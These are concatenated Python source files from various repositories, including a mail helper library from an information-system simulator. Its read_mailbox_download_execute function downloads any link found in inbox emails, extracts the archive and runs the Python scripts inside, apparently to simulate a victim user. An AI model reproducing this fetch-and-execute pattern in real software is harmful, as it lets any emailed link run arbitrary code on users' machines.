1ef2ba31fbb403bcb4ce6125ac2b8a6fd53306d0 | 527 | py | Python | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | ["MIT"] | 5 | 2019-11-11T10:01:52.000Z | 2020-12-08T11:56:33.000Z
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import imageio
import numpy as np
from tar.miscellaneous import convert_flow_to_color
prev = imageio.imread("ressources/1_1.png")
prev = cv2.cvtColor(prev, cv2.COLOR_RGB2GRAY)
curr = imageio.imread("ressources/1_2.png")
curr = cv2.cvtColor(curr, cv2.COLOR_RGB2GRAY)
flow = cv2.calcOpticalFlowFarneback(prev, curr, None, 0.9, 15, 20, 100, 10, 1.5, cv2.OPTFLOW_FARNEBACK_GAUSSIAN)
rgb = convert_flow_to_color(flow)
imageio.imsave("/Users/sele/Desktop/test.png", rgb)
1ef930c42df2781ea2ef6709774093b794cfc83e | 3,081 | py | Python | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | ["MIT"]
#!/usr/bin/env python2.7
from common import *
from random import randint, choice

registers = {
    "a"  : int("0000", 2),
    "f"  : int("0001", 2),
    "b"  : int("0010", 2),
    "c"  : int("0011", 2),
    "d"  : int("0100", 2),
    "e"  : int("0101", 2),
    "h"  : int("0110", 2),
    "l"  : int("0111", 2),
    "af" : int("1000", 2),
    "bc" : int("1001", 2),
    "de" : int("1010", 2),
    "hl" : int("1011", 2),
    "sp" : int("1100", 2),
    "pc" : int("1101", 2),
}


def output_line(fp, reg_write, reg_read, we,
                write_data, read_data, reg_w_name, reg_r_name):
    fp.write("%s %s %s %s %s #%s %s\n" %
             (to_bin(reg_write, 4),
              to_bin(reg_read, 4),
              "1" if we else "0",
              to_bin(write_data, 16),
              to_bin(read_data, 16),
              reg_w_name,
              reg_r_name))


class Registers(object):
    def __init__(self):
        self.regs = [0] * 8
        self.sp = 0
        self.pc = 0

    def write(self, reg, value):
        if reg == "af":
            self.regs[registers["a"]] = (value >> 8) & 0xff
            self.regs[registers["f"]] = (value >> 0) & 0xff
        elif reg == "bc":
            self.regs[registers["b"]] = (value >> 8) & 0xff
            self.regs[registers["c"]] = (value >> 0) & 0xff
        elif reg == "de":
            self.regs[registers["d"]] = (value >> 8) & 0xff
            self.regs[registers["e"]] = (value >> 0) & 0xff
        elif reg == "hl":
            self.regs[registers["h"]] = (value >> 8) & 0xff
            self.regs[registers["l"]] = (value >> 0) & 0xff
        elif reg == "sp":
            self.sp = value
        elif reg == "pc":
            self.pc = value
        else:
            self.regs[registers[reg]] = (value) & 0xff

    def read(self, reg):
        if reg == "af":
            return self.regs[registers["a"]] << 8 | self.regs[registers["f"]]
        elif reg == "bc":
            return self.regs[registers["b"]] << 8 | self.regs[registers["c"]]
        elif reg == "de":
            return self.regs[registers["d"]] << 8 | self.regs[registers["e"]]
        elif reg == "hl":
            return self.regs[registers["h"]] << 8 | self.regs[registers["l"]]
        elif reg == "sp":
            return self.sp
        elif reg == "pc":
            return self.pc
        else:
            return self.regs[registers[reg]]

    def random_op(self):
        we = randint(0, 1)
        reg_write = choice(registers.keys())
        reg_read = choice(registers.keys())
        write_data = randint(0, 0xffff)
        read_data = self.read(reg_read)
        if we:
            self.write(reg_write, write_data)
        return (registers[reg_write], registers[reg_read],
                we, write_data, read_data, reg_write, reg_read)


def main():
    fp = open("registers.txt", "w")
    reg = Registers()
    m = 1000000
    for i in xrange(m):
        if i % 10000 == 0:
            f = 100 * float(i) / float(m)
            print("%s" % f)
        output_line(fp, *reg.random_op())


if __name__ == "__main__":
    main()
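The 8-bit/16-bit pairing rule the `Registers` model implements (a 16-bit pair is `hi << 8 | lo`, as in the Game Boy's `af`/`bc`/`de`/`hl` registers) can be shown in isolation. A Python 3 sketch of just that packing logic (`split_pair`/`join_pair` are illustrative names):

```python
def split_pair(value):
    # 16-bit value -> (high byte, low byte), as done when writing "af" etc.
    return (value >> 8) & 0xff, (value >> 0) & 0xff


def join_pair(hi, lo):
    # (high byte, low byte) -> 16-bit value, as done when reading "af" etc.
    return (hi << 8) | lo


a, f = split_pair(0x1234)    # writing the "af" pair
print(hex(a), hex(f))        # -> 0x12 0x34
print(hex(join_pair(a, f)))  # -> 0x1234  (reading "af" back)
```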
1efa2e6d895702b8d443cbba288ae926b3327dee | 290 | py | Python | DiscordRPC/__init__.py | EterNomm/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | ["Apache-2.0"] | 4 | 2021-12-13T13:26:00.000Z | 2022-02-20T17:11:19.000Z
from .presence import *
from .button import button
from .exceptions import *
#from .get_current_app import GCAR (Disabling due to a bug)
__title__ = "Discord-RPC"
__version__ = "3.5"
__authors__ = "LyQuid"
__license__ = "Apache License 2.0"
__copyright__ = "Copyright 2021-present LyQuid"
1efbf1d335ee13e467149f16bec6b633d71434fe | 1,314 | py | Python | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | ["MIT"]
import socket
import click
import uvicorn # type: ignore
def get_address(default: str = "127.0.0.1") -> str:
try:
ip_address = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 1))
ip_address = s.getsockname()[0]
except socket.gaierror:
ip_address = default
finally:
s.close()
return ip_address
@click.group()
@click.pass_context
def server(ctx):
pass
@server.command()
@click.option("--host", default=None, help="Specify application host")
@click.option("--port", default=5000, help="Specify application port")
@click.pass_context
def run(ctx, host, port):
try:
port = int(port)
        if port < 1024 or port > 65535:
raise RuntimeError("Port should be from 1024 to 65535")
except ValueError:
raise RuntimeError("Port should be numeric")
if not host:
host = "127.0.0.1"
address = "127.0.0.1"
else:
address = get_address()
uvicorn.run(
"graph:init",
host=address,
port=port,
access_log=False,
log_level="info",
log_config=None,
loop="uvloop",
factory=True,
)
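The port handling inside `run` can be isolated into a small helper. This is a hypothetical sketch (not part of the original CLI); note that the range check must use `or`, since `port < 1024 and port > 65535` can never be true:

```python
def parse_port(value, low=1024, high=65535):
    """Parse and validate a port number, mirroring the checks in `run`."""
    try:
        port = int(value)
    except ValueError:
        raise RuntimeError("Port should be numeric")
    if port < low or port > high:
        raise RuntimeError("Port should be from %d to %d" % (low, high))
    return port

# Usage: parse_port("5000") returns 5000; "80" or "abc" raise RuntimeError.
```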
| 22.655172 | 70 | 0.590563 | 164 | 1,314 | 4.652439 | 0.445122 | 0.047182 | 0.019659 | 0.023591 | 0.076016 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049041 | 0.286149 | 1,314 | 57 | 71 | 23.052632 | 0.764392 | 0.009132 | 0 | 0.152174 | 0 | 0 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.065217 | 0.065217 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1efed2c2a7cb93434e5d67d1db9954f3a5ff1653 | 1,543 | py | Python | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | """Shared clients for kubernetes
avoids creating multiple kubernetes client objects,
each of which spawns an unused max-size thread pool
"""
from unittest.mock import Mock
import weakref
import kubernetes.client
from kubernetes.client import api_client
# FIXME: remove when instantiating a kubernetes client
# doesn't create N-CPUs threads unconditionally.
# monkeypatch threadpool in kubernetes api_client
# to avoid instantiating ThreadPools.
# This is known to work for kubernetes-4.0
# and may need updating with later kubernetes clients
_dummy_pool = Mock()
api_client.ThreadPool = lambda *args, **kwargs: _dummy_pool
_client_cache = {}
def shared_client(ClientType, *args, **kwargs):
"""Return a single shared kubernetes client instance
A weak reference to the instance is cached,
so that concurrent calls to shared_client
will all return the same instance until
all references to the client are cleared.
"""
kwarg_key = tuple((key, kwargs[key]) for key in sorted(kwargs))
cache_key = (ClientType, args, kwarg_key)
client = None
if cache_key in _client_cache:
# resolve cached weakref
# client can still be None after this!
client = _client_cache[cache_key]()
if client is None:
Client = getattr(kubernetes.client, ClientType)
client = Client(*args, **kwargs)
# cache weakref so that clients can be garbage collected
_client_cache[cache_key] = weakref.ref(client)
return client
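The weak-reference caching pattern used by `shared_client` can be shown with a minimal, self-contained sketch. The `Expensive` class here is a hypothetical stand-in for a kubernetes client object:

```python
import weakref

_cache = {}

class Expensive:
    """Stand-in for a costly client object (hypothetical)."""
    def __init__(self, name):
        self.name = name

def shared_instance(name):
    """Return a cached instance while any strong reference to it is alive."""
    obj = None
    if name in _cache:
        obj = _cache[name]()  # resolve the weakref; may be None if collected
    if obj is None:
        obj = Expensive(name)
        _cache[name] = weakref.ref(obj)  # cache a weakref, not the object
    return obj

a = shared_instance("api")
b = shared_instance("api")
assert a is b  # same object while a strong reference is held
```

Because only a weak reference is cached, dropping all outside references lets the instance be garbage collected, after which the next call builds a fresh one.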
| 32.829787 | 68 | 0.711601 | 203 | 1,543 | 5.295567 | 0.46798 | 0.089302 | 0.029767 | 0.035349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001672 | 0.224887 | 1,543 | 46 | 69 | 33.543478 | 0.897157 | 0.483474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
480a52a59f5e6ca79a9056130cb2d9abb336a9ed | 11,497 | py | Python | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 4 | 2021-11-24T10:58:51.000Z | 2022-03-11T15:13:22.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T09:16:08.000Z | 2021-11-30T16:19:41.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T11:10:38.000Z | 2021-11-24T11:10:38.000Z | import os
import wget
import time
import glob
import getpass
import tarfile
import subprocess
import email.mime.multipart
import email.mime.text
import email.mime.image
import email.mime.audio
from datetime import datetime
from pprint import pprint
from colorama import Style, Fore
from smtplib import SMTP, SMTP_SSL
from imaplib import IMAP4_SSL, IMAP4
def smtp_connect(smtp_server, verbose=True):
""" Conection to smtp server.
smtp_server_ip (str): This value is the smtp server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
smtp = SMTP_SSL(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] with SSL" +Style.RESET_ALL)
return smtp
except:
try:
smtp = SMTP(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] without SSL" +Style.RESET_ALL)
return smtp
except:
print(Fore.RED+ " ==> [smtp_connect] failed!" +Style.RESET_ALL)
return 1
def imap_connect(imap_server, username, password, verbose=True):
""" Connection to imp server.
imap_server_ip (str): This value is the imap server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
imap = IMAP4_SSL(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] with SSL" +Style.RESET_ALL)
return imap
except:
try:
imap = IMAP4(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] without SSL" +Style.RESET_ALL)
return imap
except:
print(Fore.RED+ " ==> [imap_connect] failed!" +Style.RESET_ALL)
def send_mail(smtp_server, FROM="", TO="", subject="", msg="", attachements=[], verbose=True):
""" Send mail.
smtp_server_ip (str): This value is the smtp server's ip.
FROM (str): This value is the sender email address.
    TO (list): This value is a list of multiple recipients.
SUBJECT (str, Optional): This value is the email's subject content.
msg (str, Optional): This value is the email's message content.
    attachements (list, Optional): This value is a list of ("image"|"file", filename) tuples.
verbose (boolean): Print information about function progress.
Returns:
None
"""
smtp = smtp_connect(smtp_server, verbose=False)
mail = email.mime.multipart.MIMEMultipart()
mail["Subject"] = "[ "+subject+" ]"
mail["From"] = FROM
mail["To"] = TO
msg = email.mime.text.MIMEText(msg, _subtype="plain")
msg.add_header("Content-Disposition", "email message")
mail.attach(msg)
for attachement in attachements:
if attachement[0] == "image":
img = email.mime.image.MIMEImage(open(attachement[1], "rb").read())
img.add_header("Content-Disposition", "attachement")
img.add_header("Attachement-type", "image")
img.add_header("Attachement-filename", attachement[1])
mail.attach(img)
if attachement[0] == "file":
text = email.mime.text.MIMEText(open(attachement[1], "r").read())
text.add_header("Content-Disposition", "attachement")
text.add_header("Attachement-type", "filetext")
text.add_header("Attachement-filename", attachement[1])
mail.attach(text)
try:
smtp.sendmail(mail["From"], mail["To"], mail.as_string())
if verbose:
print(Fore.GREEN+ " ==> [send_mail] "+mail["From"]+" --> "+mail["To"]+" {"+subject+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
except Exception as e:
print(Fore.RED+ " ==> [send_mail] failed! "+mail["From"]+" --> "+mail["To"]+" -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(Fore.RED+str(e)+Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
def read_mailbox(imap_server, username, password, verbose=True):  # attribute: [_payload]
""" Read email inbox
imap_server_ip (str): This value is the imap server's ip.
login (str): This value is the username login.
password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
all_mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
all_mails.append(mail_content)
for part in mail_content.walk():
if not part.is_multipart():
pass
if verbose:
print(Fore.GREEN+ " ==> [read_mailbox] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return all_mails
def read_mailbox_download_execute(imap_server, imap_login, imap_password):
""" Read email inbox and download link inside.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
try:
path = None
mails = read_mailbox(imap_server, imap_login, imap_password, verbose=False)
if len(mails) <= 0:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
for mail in mails:
for element in str(mail).replace("\n", " ").split(" "):
if "http" in element:
path = wget.download(element)
if path == None:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
tarf_file = tarfile.open(path)
tarf_file.extractall(".")
tarf_file.close()
python_files = glob.glob("*/*maj*.py")
for python_script in python_files:
subprocess.getoutput("python3 "+python_script)
print(Fore.GREEN+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return True
except Exception as e:
print(Fore.RED+ " ==> [read_mailbox_download_execute] failed during execution! -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(e)
return False
def download_attachements(imap_server, username, password, verbose=True):
""" Read email inbox and download attachements.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
    # Ensure the Downloads directory exists
if not os.path.isdir("/home/"+getpass.getuser()+"/Downloads"):
os.makedirs("/home/"+getpass.getuser()+"/Downloads")
mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
for part in mail_content.walk():
if not part.is_multipart():
if part["Content-Disposition"] == "attachement" and part["Attachement-type"] == "filetext":
username = getpass.getuser()
file = open(part["Attachement-filename"],"w")
file.write(part._payload)
file.close()
imap_logout(imap, verbose=False)
print(Fore.GREEN+ " ==> [download_attachements] --- " + time.strftime("%H:%M:%S", time.localtime())+Style.RESET_ALL)
# In progress
def delete_old_emails(imap, time_laps=60):
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
if (time.time() - time.mktime(time.strptime(mail_content["Date"], "%a, %d %b %Y %H:%M:%S %z")) >= time_laps ):
delete_messages.append(mail)
delete_emails(imap, delete_messages)
def delete_emails(imap, mails):
""" Delete mails specified in attributs
imap (imap_object): This value is the imap server's object.
mails (list): This value is an email list to delete.
Returns:
list of str: all emails content
"""
for mail in mails:
imap.store(mail,"+FLAGS","\\Deleted")
imap.expunge()
def delete_all_emails(imap_server, username, password, verbose=True):
""" Delete all emails in INBOX.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
delete_messages.append(mail)
delete_emails(imap, delete_messages)
status, mails = imap.search(None, "ALL")
if len(mails) == 1:
        print(Fore.GREEN+ " ==> [delete_all_emails] was successful --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 0
print(Fore.RED+ " ==> [delete_all_emails] failed! --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 1
def imap_logout(imap, verbose=True):
""" Logout out to the imap service
imap (imap_object): This value is the imap server's object.
Returns:
None
"""
try:
imap.close()
imap.logout()
if verbose:
            print(Fore.GREEN+ " ==> [imap_logout] was successful" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [imap_logout] failed" +Style.RESET_ALL)
def smtp_logout(smtp, verbose=True):
""" Logout out to the smtp service
smtp (smtp_object): This value is the smtp server's object.
Returns:
None
"""
try:
smtp.quit()
if verbose:
            print(Fore.GREEN+ " ==> [smtp_logout] was successful" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [smtp_logout] failed" +Style.RESET_ALL)
| 41.060714 | 168 | 0.609898 | 1,431 | 11,497 | 4.781272 | 0.134871 | 0.030254 | 0.036977 | 0.04297 | 0.655949 | 0.590178 | 0.540047 | 0.494592 | 0.456299 | 0.431453 | 0 | 0.005383 | 0.256676 | 11,497 | 279 | 169 | 41.207885 | 0.795226 | 0.231278 | 0 | 0.424731 | 0 | 0 | 0.151743 | 0.017252 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05914 | false | 0.086022 | 0.086022 | 0 | 0.209677 | 0.123656 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
48137f6833204958dbcfd12efea83db5d3727b1f | 158 | py | Python | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | x=input("Enter a umber of which you want to know the square root.")
x=int(x)
g=x/2
while (g*g-x)*(g*g-x)>0.00000000001:
g=(g+x/g)/2
print(g)
print(g)
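The loop above is Newton's (Babylonian) method; squaring the error term is a workaround for a missing `abs()`. A sketch of the same idea with a named tolerance (assuming x > 0):

```python
def babylonian_sqrt(x, tolerance=1e-9):
    """Approximate sqrt(x) for x > 0 by Newton's method."""
    g = x / 2 or 1.0  # initial guess
    while abs(g * g - x) > tolerance:
        g = (g + x / g) / 2  # average the guess with x/guess
    return g

# babylonian_sqrt(25) converges to a value very close to 5.0
```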
| 19.75 | 67 | 0.620253 | 38 | 158 | 2.578947 | 0.552632 | 0.081633 | 0.091837 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10687 | 0.170886 | 158 | 7 | 68 | 22.571429 | 0.641221 | 0 | 0 | 0.285714 | 0 | 0 | 0.35443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
482697dcf4d097846528ae15ee8dbca33b6e86d7 | 525 | py | Python | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | import praw
import re
import os
reddit = praw.Reddit('Splunge Bot v1', client_id=os.environ['REDDIT_CLIENT_ID'], client_secret=os.environ['REDDIT_CLIENT_SECRET'], password=os.environ['REDDIT_PASSWORD'], username=os.environ['REDDIT_USERNAME'])
subreddit = reddit.subreddit('tubasaur')
for submission in subreddit.new(limit=5):
for top_level_comment in submission.comments:
if re.search('splunge', top_level_comment.body, re.IGNORECASE):
top_level_comment.reply("Well, yeah, splunge for me too!")
print("Splunged.")
| 40.384615 | 210 | 0.775238 | 76 | 525 | 5.171053 | 0.486842 | 0.091603 | 0.152672 | 0.10687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004193 | 0.091429 | 525 | 12 | 211 | 43.75 | 0.819707 | 0 | 0 | 0 | 0 | 0 | 0.257634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.3 | 0 | 0.3 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4834a12f8b0a1adc974a9695986c5da1d9c04010 | 603 | py | Python | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 9 | 2020-02-03T11:17:06.000Z | 2021-06-15T13:20:34.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 40 | 2020-02-03T11:23:59.000Z | 2020-05-19T08:05:41.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 1 | 2020-03-11T02:47:40.000Z | 2020-03-11T02:47:40.000Z | """API schemas for users."""
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class User(BaseModel):
"""Schema for a user account"""
username: str
bio: Optional[str]
avatar_url: Optional[str]
created: datetime
edited: Optional[datetime]
class Config:
orm_mode = True
class CreateUser(BaseModel):
"""Schema for creating a new user account"""
username: str
password: str
class EditUser(BaseModel):
"""Schema for editing a user account"""
bio: Optional[str] = None
avatar_url: Optional[str] = None
| 20.1 | 48 | 0.681592 | 75 | 603 | 5.44 | 0.453333 | 0.107843 | 0.132353 | 0.107843 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.223881 | 603 | 29 | 49 | 20.793103 | 0.871795 | 0.200663 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.058824 | 0.176471 | 0 | 0.941176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
483592e4049e6951c186723536311a58d0a2c2a3 | 1,459 | py | Python | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 408 | 2015-01-01T10:31:47.000Z | 2022-03-26T17:41:21.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 521 | 2015-01-08T14:45:54.000Z | 2022-03-24T11:15:22.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 158 | 2015-01-25T20:02:00.000Z | 2022-03-01T06:29:12.000Z | import re
from .._compat import integer_types, long
from .base import SQLAdapter
from . import adapters
@adapters.register_for("sapdb")
class SAPDB(SQLAdapter):
dbengine = "sapdb"
drivers = ("sapdb",)
REGEX_URI = (
"^(?P<user>[^:@]+)(:(?P<password>[^@]*))?"
r"@(?P<host>[^:/]+|\[[^\]]+\])/(?P<db>[^?]+)$"
)
def _initialize_(self):
super(SAPDB, self)._initialize_()
ruri = self.uri.split("://", 1)[1]
m = re.match(self.REGEX_URI, ruri)
if not m:
raise SyntaxError("Invalid URI string in DAL")
user = self.credential_decoder(m.group("user"))
password = self.credential_decoder(m.group("password"))
if password is None:
password = ""
host = m.group("host")
db = m.group("db")
self.driver_args.update(user=user, password=password, database=db, host=host)
def connector(self):
self.driver.connect(**self.driver_args)
def lastrowid(self, table):
self.execute("select %s.NEXTVAL from dual" % table._sequence_name)
return long(self.cursor.fetchone()[0])
def create_sequence_and_triggers(self, query, table, **args):
self.execute("CREATE SEQUENCE %s;" % table._sequence_name)
self.execute(
"ALTER TABLE %s ALTER COLUMN %s SET DEFAULT NEXTVAL('%s');"
% (table._rname, table._id._rname, table._sequence_name)
)
self.execute(query)
| 32.422222 | 85 | 0.592186 | 175 | 1,459 | 4.794286 | 0.428571 | 0.028605 | 0.060787 | 0.052443 | 0.131108 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002712 | 0.241947 | 1,459 | 44 | 86 | 33.159091 | 0.755877 | 0 | 0 | 0 | 0 | 0 | 0.169294 | 0.056888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0.135135 | 0.108108 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4843692979b67bbb7eade27d08ade8ca10f18066 | 2,012 | py | Python | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | # today is 389f
# the python pit
# magPi - 05
# MOUNTAINS
import os, pygame; from pygame.locals import *
pygame.init(); clock = pygame.time.Clock()
os.environ['SDL_VIDEO_WINDOW_POS'] = 'center'
pygame.display.set_caption("Mountains")
screen=pygame.display.set_mode([600,382],0,32)
sky = pygame.Surface((600,255))
r=0; g=64; b=128
for l in range (0,255):
pygame.draw.rect(sky,(r,g,b),(0,l-1,600,l))
r=r+1;g=g+1;b=b+1
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
ground = pygame.Surface((600,128))
r=192; g=255; b=192
for l in range (0,128):
pygame.draw.rect(ground,(r,g,b),(0,l-2,600,l))
r=r-2;g=g-2;b=b-2
if r<=0: r=0
if g<=0: g=0
if b<=0: b=0
# Add in an extra surface for the mountains
